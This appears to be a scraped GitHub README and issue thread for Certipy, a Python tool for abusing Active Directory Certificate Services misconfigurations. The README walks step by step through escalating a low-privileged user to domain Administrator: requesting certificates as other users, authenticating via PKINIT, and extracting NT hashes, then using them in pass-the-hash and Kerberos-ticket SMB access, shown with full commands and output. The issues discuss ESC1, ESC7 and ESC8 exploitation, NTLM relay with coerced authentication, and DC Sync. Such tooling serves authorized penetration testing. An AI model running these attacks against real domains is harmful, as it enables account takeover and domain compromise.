Python implementation for Active Directory certificate abuse

Overview

Certipy

Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Based on the C# variant Certify from @harmj0y and @tifkin_.

Table Of Contents

Installation

$ python3 setup.py install

Remember to add the Python scripts directory to your path.

Usage

$ certipy -h
usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
               target {find,req,auth,auto} ...

Active Directory certificate abuse

positional arguments:
  target                [[domain/]username[:password]@]<target name or address>
  {find,req,auth,auto}  Action
    find                Find certificate templates
    req                 Request a new certificate
    auth                Authenticate with a certificate
    auto                Automatically abuse certificate templates for privilege escalation

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it
  -nameserver nameserver
                        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Examples

Auto

Automatically abuse certificate templates for privilege escalation. This action will try to find, request and authenticate as the Administrator user. Upon success, a credential cache will be saved and the NT hash will be decrypted from the PAC in the TGS_REP.

To demonstrate how easy it is to misconfigure certificate templates, the default certificate template Web Server has been copied to Copy of Web Server. The only change was that the EKU Server Authentication was removed and that authenticated users are allowed to enroll. This will allow enrollees to specify the subject and use it for client authentication, i.e. authenticate as any user. If no EKUs are specified, then the certificate can be used for all purposes. Alternatively, one could add the Client Authentication EKU.

In this example, the user john is a low privileged user who is allowed to enroll for the Copy of Web Server template.

$ certipy 'predator/john:[email protected]' auto
[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate to '1.crt'
[*] Saved private key to '1.key'
[*] Using UPN: 'Administrator@predator'
[*] Trying to get TGT...
[*] Saved credential cache to 'Administrator.ccache'
[*] Trying to retrieve NT hash for 'Administrator@predator'
[*] Got NT hash for 'Administrator@predator': fc525c9683e8fe067095ba2ddc971889

By default, the user Administrator is chosen. Use the -user parameter to create a certificate for another user.

Find

The find action will find certificate templates that are enabled by one or more CAs.

Find vulnerable templates

Use the -vulnerable parameter to only find vulnerable certificate templates.

$ certipy 'predator/john:[email protected]' find -vulnerable
[*] Finding vulnerable certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Vulnerable Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
    Vulnerable Reasons                  : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication
                                          'Authenticated Users' can enroll and template has dangerous EKU

Use the -user parameter to find vulnerable certificate templates for another user. By default, the current user will be used.

Find all templates

$ certipy 'predator/john:[email protected]' find
[*] Finding certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : User
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectRequireEmail
                                          SubjectAltRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
                                          IncludeSymmetricAlgorithms
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Domain Users
                                          predator\Enterprise Admins
      Object Control Permissions
        Owner                           : predator\Enterprise Admins
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
[...]
  11
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator

Request

Request a new certificate from a certificate template. By default, the current user specified in the target parameter will be used.

Request as another user

To request a certificate as another user, use the -alt parameter. This only applies to certificate templates, where the enrollee specifies the subject, or when the CA allows the enrollee to specify a UPN, i.e. User Specified SAN is set to Enabled.

In this example, the user john is a low privileged user. The certificate template Copy of Web Server is a copy of the default Web Server template. The EKU Server Authentication was removed, such that the template has no EKUs (No EKUs = any purpose). The default Web Server template allows the enrollee to supply the subject.

john will request a certificate valid for authentication as jane. The CA predator-DC-CA has Copy of Web Server enabled.

$ certipy 'predator/john:[email protected]' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'jane'
[*] Saved certificate to '2.crt'
[*] Saved private key to '2.key'

The certificate and key will be DER encoded and saved to .(crt|key) , where request ID is returned by the server.

Request as self

It is also possible to request a certificate for the current user. This is a good option for persistence since a certificate is not affected by password changes. By default, domain users are allowed to enroll in the default User template.

$ certipy 'predator/john:[email protected]' req -template 'User' -ca 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN '[email protected]'
[*] Saved certificate to '3.crt'
[*] Saved private key to '3.key'

Authenticate

The auth action will use the PKINIT Kerberos extension to authenticate with the provided certificate. The target user must be specified in the target parameter. If not specified, Certipy will try to extract the UPN from the certificate. The TGT will be saved in a credential cache to .ccache .

The NT hash will be extracted by using Kerberos U2U to request a TGS for the current user, where the encrypted PAC will contain the NT hash, which can be decrypted.

$ certipy 'predator/[email protected]' auth -cert ./2.crt -key ./2.key
[*] Using UPN: 'jane@predator'
[*] Trying to get TGT...
[*] Saved credential cache to 'jane.ccache'
[*] Trying to retrieve NT hash for 'jane@predator'
[*] Got NT hash for 'jane@predator': 077cccc23f8ab7031726a3b70c694a49

Using the NT hash

You can simply pass-the-hash (PTH) for many services. For instance SMB:

$ impacket-smbclient -hashes :fc525c9683e8fe067095ba2ddc971889 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: administrator, active:     1, idle:     0

Using the credential cache

The credential cache currently holds a TGT. The TGT can be used to request TGSs for services. For instance, to request a TGS for the cifs (SMB) service at dc.predator.local:

$ # use TGT from Certipy
$ export KRB5CCNAME=./Administrator.ccache
$ # request TGS
$ impacket-getST -spn 'cifs/dc.predator.local' -dc-ip 172.16.19.100 -no-pass -k 'predator/administrator'
$ # use TGS from impacket-getST
$ export KRB5CCNAME=./administrator.ccache
$ # run smbclient with TGS (notice the FQDN)
$ impacket-smbclient -k -no-pass 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: Administrator, active:     1, idle:     0

Note that impacket-getST will overwrite the credential cache at .ccache . Create a copy of the credential cache from Certipy before requesting a TGS with impacket-getST.

Errors

Please submit any errors, issues, or questions under "Issues". A lot of errors can be caused by the user, tool, and target, but the error handling is not perfect.

Credits

Comments
  • Help understanding limitations of

    Help understanding limitations of "KDC_ERR_PADATA_TYPE_NOSUPP"

    Hello!

    Certipy has identified a number of templates in this environment vulnerable to ESC1. I've done:

    certipy req 'victim.domain/[email protected]' -ca 'CA-NAME' -template 'VULNERABLETEMPLATE' -k -no-pass -alt '[email protected]'

    I got a domainadmin.pfx and I'm ready to test it out.

    When I do certipy auth -pfx domainadmin.pfx -dc-ip ip.of.domain.controller I get:

    [*] Trying to get TGT...
    [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
    

    Upon checking this repo's issues, I came across this one leading me to believe I can use this blog/tool to abuse this path via Linux, but from your blog it's my understanding that if the CA is fully patched, this is a dead end.

    To further confuse me, this blog makes me think abuse still is possible, but this content looks to be specifically about abuse when you've obtained the cert for a domain controller (which I have not).

    Would you point me in the right direction - just so I'm not chasing a dead end?

    opened by 7MinSec 14
  • error: SandboxViolation

    error: SandboxViolation

    error: Setup script exited with error: SandboxViolation: mkdir('/private/var/root/Library/Caches/com.apple.python/private/tmp/easy_install-qii5l5tu', 511) {}

    opened by void-ll 11
  • Got error: 'NoneType' object has no attribute 'request'

    Got error: 'NoneType' object has no attribute 'request'

    I am attempting to perform a certificate request using the current version of certipy.

    I've ran the setup and did not see any issues/errors.

    When attempting the req I am getting a error concerning the request attribute.

    Below is the output from the command as well as the output from the command with the suggested -debug option.

    ============================

    user4@kali:/usr/share/Certipy# certipy req 'domain/usertest:redacted@dc3' -ca ca3 -template User Certipy v3.0.0 - by Oliver Lyak (ly4k)

    [*] Requesting certificate [-] Failed to get dynamic TCP endpoint for CertSvc [-] Got error: 'NoneType' object has no attribute 'request' [-] Use -debug to print a stacktrace

    ===========================

    root@kali-tb:/usr/share/Certipy# certipy req 'domain/usertest:redacted@dc3' -ca ca3 -template User -debug Certipy v3.0.0 - by Oliver Lyak (ly4k)

    [+] Trying to resolve 'dc3' at '192.168.202.2' [+] Generating RSA key [*] Requesting certificate [+] Trying to connect to endpoint: ncacn_np:192.168.0.31[\pipe\cert] [!] Failed to connect to endpoint ncacn_np:192.168.0.31[\pipe\cert]: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.) [+] Trying to resolve dynamic endpoint 'redacted' [+] Failed to resolve dynamic endpoint 'redacted' [-] Failed to get dynamic TCP endpoint for CertSvc [-] Got error: 'NoneType' object has no attribute 'request' Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/entry.py", line 85, in main actionsoptions.action File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/request.py", line 334, in entry request.request() File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/request.py", line 256, in request response = self.dce.request(request) AttributeError: 'NoneType' object has no attribute 'request'

    opened by forensic65x 9
  • ESC7 - Error when attempting to add an officer

    ESC7 - Error when attempting to add an officer

    When attemting to exploit ESC7 and the account I use for authentication does not have the right Manage Certificates, I must add that account as a new officer in order to grant the account that right. This fails for me using Certipy 2.0.6. esc7_dc1

    Once this works, can I delete/remove the officer and possibly other remaining changes after the attack?

    opened by jsdhasfedssad 8
  • certipy: error: unrecognized arguments

    certipy: error: unrecognized arguments

    Hello,

    I have cloned the repo using the command

    git clone https://github.com/ly4k/Certipy.git
    

    I then cd'd into the Certipy directory and ran the command

    sudo python3 /path/to/Certipy/setup.py install
    

    I am trying to execute the basic certipy find command and I am getting an error regarding unrecognized commands

    The command that I am executing is:

    certipy find "fqdn/user_samaccountname:password@domain_controller_fqdn_or_IPAddress"
    

    After running the command I am getting the error message

    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    usage: certipy [-v] [-h] {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template} ...
    certipy: error: unrecognized arguments: fqdn/user_samaccountname:password@domain_controller_fqdn_or_IPAddress
    

    I have been to the blog post and read through it but no luck- https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6

    All documentation that I am seeing is on version 2. Could this be a version 4 issue?

    Thanks!

    opened by robertstrom 7
  • Formatting question for

    Formatting question for "ESC1 - SAN Impersonation" attack

    Hello!

    I've got an environment where I've run the Certipy enumeration and have a template vulnerable to ESC1. I've requested a TGT for my "standard" user using GetTGT from impacket. And then I've launched Certipy as follows:

    certipy 'NETBIOS-NAME-OF-DOMAIN/regularuser@VULN-CA-SERVER' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req template 'VULNERABLETEMPLATE' -ca 'CA-NAME' -alt 'DOMAIN-ADMIN'
    

    When this runs, I get:

    [+] Trying to resolve 'VULN-CA-SERVER' at 'IP-OF-DC'
    [+] Connecting to SMB at 'VULN-CA-SERVER' 
    [+] Using Kerberos Cache: regularuser.ccache
    [+] SPN CIFS/VULN-CA-SERVER.DOMAIN.COM@NETBIOS-NAME-OF-DOMAIN not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] SPN KRBTGT/NETBIOS-NAME-OF-DOMAIN@NETBIOS-NAME-OF-DOMAIN not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] No valid credentials found in cache.
    

    This is followed by a traceback and tons of python errors. Do I have a syntax error? I'm not sure what the expected output should look like.

    Thanks, Brian

    opened by 7MinSec 7
  • Help understanding

    Help understanding "relay" issues?

    Hello!

    I'm on a pentest where Certipy has reported a host called "CA" is vulnerable to ESC8.

    I setup Certipy in one window as follows:

    certipy relay -ca ca.domain.com

    In another window I did Coercer with:

    coercer.py -u lowprivuser -p mypass -t IP.OF.A.DC -l MY.KALI.IP.ADDRESS

    In the Certipy window I get:

    Targeting http://ca.domain.com/certsrv/certfnsh.asp
    Listening on 0.0.0.0:445
    Requesting certificate for 'DOMAIN\\DC$' based on the template "Machine'
    Request ID is 123
    Would you like to save the private key? (y/N)
    

    It seems like this is the kind of behavior I'd expect to see if the config was vulnerable to ESC7.

    Any help pointing me in the right direction to troubleshoot would be much appreciated!

    Thanks, Brian

    opened by 7MinSec 6
  • E_INVALIDARG - One or more arguments are invalid

    E_INVALIDARG - One or more arguments are invalid

    An error occurred while requesting a certificate using a domain user I am using version 4.0 This is the command I used:certipy req -username [email protected] -p Passowrd! -ca test-DC01-CA -template User -target 173.100.4.60 -debug The following is the error report: [+] Trying to connect to endpoint: ncacn_np:173.100.4.60[\pipe\cert] [proxychains] Strict chain ... 192.168.172.130:1080 ... 173.100.4.60:445 ... OK [+] Connected to endpoint: ncacn_np:173.100.4.60[\pipe\cert] [-] Got error: RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid. Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/entry.py", line 60, in main actions[options.action](options) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/parsers/req.py", line 12, in entry req.entry(options) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 764, in entry request.request() File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 715, in request cert = self.interface.request(csr, attributes) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 208, in request response = self.dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20220502.112312.90866d4c-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request raise exception

    opened by helloyw 6
  • Problems with passwords that contain '#' ?

    Problems with passwords that contain '#' ?

    Hello,

    I'm using certipy on a pentest where my AD account password has '#' in it. When I run a 'certipy find' I get the below error in the output. I am running the latest/greatest certipy on 2 different pentests right now, and on the pentest where my password is just upper/lower/numbers (and a special character that is not a '#'), certipy runs fine.

    [*] Finding certificate templates
    [+] Authenticating to LDAP server
    [-] Got error: PY_SSIZE_T_CLEAN macro must be defined for '#' formats
    Traceback (most recent call last):
      File "/usr/lib/python3.10/hashlib.py", line 160, in __hash_new
        return _hashlib.new(name, data, **kwargs)
    ValueError: [digital envelope routines] unsupported
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
        password_digest = hashlib.new('MD4', self._password.encode('utf-16-le')).digest()
      File "/usr/lib/python3.10/hashlib.py", line 166, in __hash_new
        return __get_builtin_constructor(name)(data)
      File "/usr/lib/python3.10/hashlib.py", line 123, in __get_builtin_constructor
        raise ValueError('unsupported hash type ' + name)
    ValueError: unsupported hash type MD4
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/entry.py", line 85, in main
        actions[options.action](options)
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 736, in entry
        find.find()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 116, in find
        certificate_templates = self.get_certificate_templates()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 691, in get_certificate_templates
        certificate_templates = self.connection.search(
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 109, in connection
        self._connection.connect()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/ldap.py", line 53, in connect
        self.connect(version=ssl.PROTOCOL_TLSv1_2)
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/ldap.py", line 100, in connect
        bind_result = ldap_conn.bind()
      File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 621, in bind
        response = self.do_ntlm_bind(controls)
      File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 1388, in do_ntlm_bind
        request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client,
      File "/usr/lib/python3/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
        server_creds = name.create_authenticate_message()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
        nt_challenge_response = self.compute_nt_response()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
        response_key_nt = self.ntowf_v2()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 501, in ntowf_v2
        password_digest = MD4.new(self._password.encode('utf-16-le')).digest()
    SystemError: PY_SSIZE_T_CLEAN macro must be defined for '#' formats
    
    opened by 7MinSec 6
  • "Auth" module throws ImportError

    Hi there, I got introduced to Certipy via the TryHackMe room CVE-2022-26923. I installed the latest version of Certipy via PyPI.

    The request module successfully saves a certificate to local storage.

    image

    When I tried to use the certificate for authentication, I got an ImportError.

    image

    The same command using Certipy version 2.0.9 with the same certificate does work.

    image

    I am using a dockerized Kali with Python 3.10 on an aarch64 machine.

    opened by tdekeyser 5
  • RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid

    RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid

    [*] Requesting certificate [-] Got error: RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid. [-] Use -debug to print a stacktrace image

    Has the boss ever reported this error

    opened by howtogetfish 5
  • Support for relaying NTLM to ICPR (ESC11)

    Support for relaying NTLM to ICPR (ESC11)

    Hi,

    Again, thank you for this tool!

    I recently stumbled upon this article about relaying NTLM to ICPR by Compass Security using a CA which has "IF_ENFORCEENCRYPTICERTREQUEST" disabled. They have dubbed it ESC11. They use a fork of Certipy for identification of vulnerable CAs and a fork of Impacket to abuse them. I can see that there is a PR (105) for the identification part but there isn't one for the abuse part. Would you consider supporting ESC11? Both the identification and abuse parts.

    Thanks!

    opened by jsdhasfedssad 1
  • [Enhancement] Adding Dockerfile

    [Enhancement] Adding Dockerfile

    Hi!

    If there's any interest in a dockerized version, I've created a Dockerfile and edited the README with instructions. I hit some dependency snags when working with Certipy and sought to solve them with Docker. The dockerfile is derived from the dockerfiles of Impacket and CrackMapExec.

    The mounted volume is good for collecting all of the artifacts. You should also still be able to publish a port for certipy relay but I have not tested that yet.

    This set up may need some testing to make sure it works in all use cases but so far so good for me! (Tested w. ESC1, 2, 3, Golden Certificate)

    opened by HuskyHacks 0
  • Python 3.11 compatibility because of enum module

    Python 3.11 compatibility because of enum module

    At the moment, Certipy is not compatible with Python 3.11.

    This is because it uses the undocumented _decompose function of the enum module, which apparently got removed in Python 3.11. When running under this version of Python, the following error is shown:

    AttributeError: module 'enum' has no attribute '_decompose'
    

    The problematic function calls are in certipy/lib/structs.py and certipy/lib/constants.py.

    opened by exploide 1
  • Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.

    Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.

    Hello,

    I am building an environment to test ESC2 and ESC3. I have an AD CS template with EKU "Any purpose" setup as well as the default "User" template published.

    First off i'll fetch the "Any purpose" EKU (ESC2/3) template:

    /usr/local/bin/certipy req  -u [email protected] -p ******** -ca test-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x
    

    Then i'll use that pfx to sign a new CSR and apply for a client authentication certificate via the default template User on behalt of the Administrator.

    /usr/local/bin/certipy req  -u [email protected] -p ******** -ca test-corp-CA01-CA -template User -on-behalf-of 'DOMAIN\Administrator' -target-ip x.x.x.x -dc-ip x.x.x.x. -pfx test.pfx
    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    [*] Requesting certificate via RPC
    [-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
    [*] Request ID is 114
    Would you like to save the private key? (y/N)
    

    I get the same error when i try to renew the initial test.pfx certificate.

    /usr/local/bin/certipy req -renew  -u [email protected] -p ******** -ca test-corp-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x -pfx test.pfx
    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    [*] Requesting certificate via RPC
    [-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
    [*] Request ID is 115
    Would you like to save the private key? (y/N)
    

    The ESC2/3 privesc works fine from certify.exe from a domain joined windows box.

    I have tried to figure out which ASN.1 tag in https://github.com/ly4k/Certipy/blob/main/certipy/lib/certificate.py#L525 that might be wrong however i'm not successful.

    I'm on the latest 92592c59acf50e5db3ace2947680614c110aff82 commit.

    opened by viksafe 1
  • Some try/except to make it work in a test env

    Some try/except to make it work in a test env

    This makes it work in my test env. If you cant add a machine for example. The others I did not investigate fully, but the try/catch makes certipy at least not fully crash

    opened by realalexandergeorgiev 0
  • "Auth" command after NTLM relay to an HTTP endpoint returns error when getting TGT: KRB_AP_ERR_MODIFIED

    When performing a basic NTLM relay attack (with PetitPotam to coerce auth) using the "relay" command, everything goes fine as you see below:

    image

    The PFX is saved and no error is thrown. However, when you follow this up with a certipy auth as below, a Kerberos error is thrown upon requesting the TGT:

    image

    However, requesting the TGT and NTLM hash with Rubeus works just as expected:

    image

    And then I was able to DC Sync with CME using the NTLM hash and/or TGT:

    image

    The DC involved is a Windows Server 2022 and the CA, on a separate server specifically to facilitate the NTLM relay simulation, is Windows Server 2019. I suspect this may be an issue related to the super up-to-date version of Windows Server that the DC is running on; perhaps Certipy just hasn't been updated to cope with it yet but Rubeus has (it receives more regular updates). Any idea is appreciated, though!

    opened by Alh4zr3d 1
Releases(4.3.0)
Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
User management system (UMS), has the primary purpose of connecting to an Active Directory (AD)

?? Sistema de Gerenciamento de Usuário (SGU) ?? Sobre o projeto Sistema de gerenciamento de usuários (SGU), tem o objetivo primário de se conectar a u

Patrick Viegas 2 Feb 25, 2022
Automate your Microsoft Learn Student Ambassadors event certificate with Python

Microsoft Learn Student Ambassador Certificate Automation This repo simply use a template certificate docx file and generates certificates both docx a

Muhammed Oğuz 24 Aug 24, 2022
Python client SDK designed to simplify integrations by automating key generation and certificate enrollment using Venafi machine identity services.

This open source project is community-supported. To report a problem or share an idea, use Issues; and if you have a suggestion for fixing the issue,

Venafi, Inc. 13 Sep 27, 2022
Subcert is an subdomain enumeration tool, that finds all the subdomains from certificate transparency logs.

Subcert Subcert is a subdomain enumeration tool, that finds all the valid subdomains from certificate transparency logs. Table of contents Setup Demo

A3h1nt 59 Dec 16, 2022
Automatic certificate unpinning for Android apps

What is this? Script used to perform automatic certificate unpinning of an APK by adding a custom network security configuration that permits user-add

Antoine Neuenschwander 5 Jul 28, 2021
A blazing fast mass certificate generator script for the community ⚡

A simple mass certificate generator script for the community ⚡ Source Code · Docs · Raw Script Docs All you need Certificate Design a simple template

Tushar Nankani 24 Jan 3, 2023
Python plugin/extra to load data files from an external source (such as AWS S3) to a local directory

Data Loader Plugin - Python Table of Content (ToC) Data Loader Plugin - Python Table of Content (ToC) Overview References Python module Python virtual

Cloud Helpers 2 Jan 10, 2022
This Python library searches through a static directory and appends artist, title, track number, album title, duration, and genre to a .json object

This Python library searches through a static directory (needs to match your environment) and appends artist, title, track number, album title, duration, and genre to a .json object. This .json object is then used to post data to a specified table in a local MySQL database, credentials of which the user must set.

Edan Ybarra 1 Jun 20, 2022
Navigate to your directory of choice the proceed as follows

Installation ?? Navigate to your directory of choice the proceed as follows; 1 .Clone the git repo and create a virtual environment Depending on your

Ondiek Elijah Ochieng 2 Jan 31, 2022
Get a link to the web version of a git-tracked file or directory

githyperlink Get a link to the web version of a git-tracked file or directory. Applies to GitHub and GitLab remotes (and maybe others but those are no

Tomas Fiers 2 Nov 8, 2022
An example project that shows how to check if a certain macro is active in a file.

PlatformIO Check Compiler Flags Example Description Demonstrates the usage of an extra script and a special compilter invocation to get the active mac

Maximilian Gerhardt 1 Oct 28, 2021
A simply program to find active jackbox.tv game codes

PeepingJack A simply program to find active jackbox.tv game codes How does this work? It uses a threadpool to loop through all possible codes in a ran

null 3 Mar 20, 2022
Active Transport Analytics Model: A new strategic transport modelling and data visualization framework

{ATAM} Active Transport Analytics Model Active Transport Analytics Model (“ATAM”

ATAM Analytics 2 Dec 21, 2022
Implementation of the Angular Spectrum method in Python to simulate Diffraction Patterns

Diffraction Simulations - Angular Spectrum Method Implementation of the Angular Spectrum method in Python to simulate Diffraction Patterns with arbitr

Rafael de la Fuente 276 Dec 30, 2022
Python implementation of the ASFLIP advection method

This is a python implementation of the ASFLIP advection method . We would like to hear from you if you appreciate this work.

Raymond Yun Fei 133 Nov 13, 2022
A Gura parser implementation for Python

Gura parser This repository contains the implementation of a Gura format parser in Python. Installation pip install gura-parser Usage import gura gur

JWare Solutions 19 Jan 25, 2022
A python implementation of differentiable quality diversity.

Differentiable Quality Diversity This repository is the official implementation of Differentiable Quality Diversity.

ICAROS 41 Nov 30, 2022
Reference python implementation of Chia pool operations for pool operators

This repository provides a sample server written in python, which is meant to server as a basis for a Chia Pool. While this is a fully functional implementation, it requires some work in scalability and security to run in production.

Chia Network 451 Dec 13, 2022
A fast python implementation of DTU MVS 2014 evaluation

DTUeval-python A python implementation of DTU MVS 2014 evaluation. It only takes 1min for each mesh evaluation. And the gap between the two implementa

null 82 Dec 27, 2022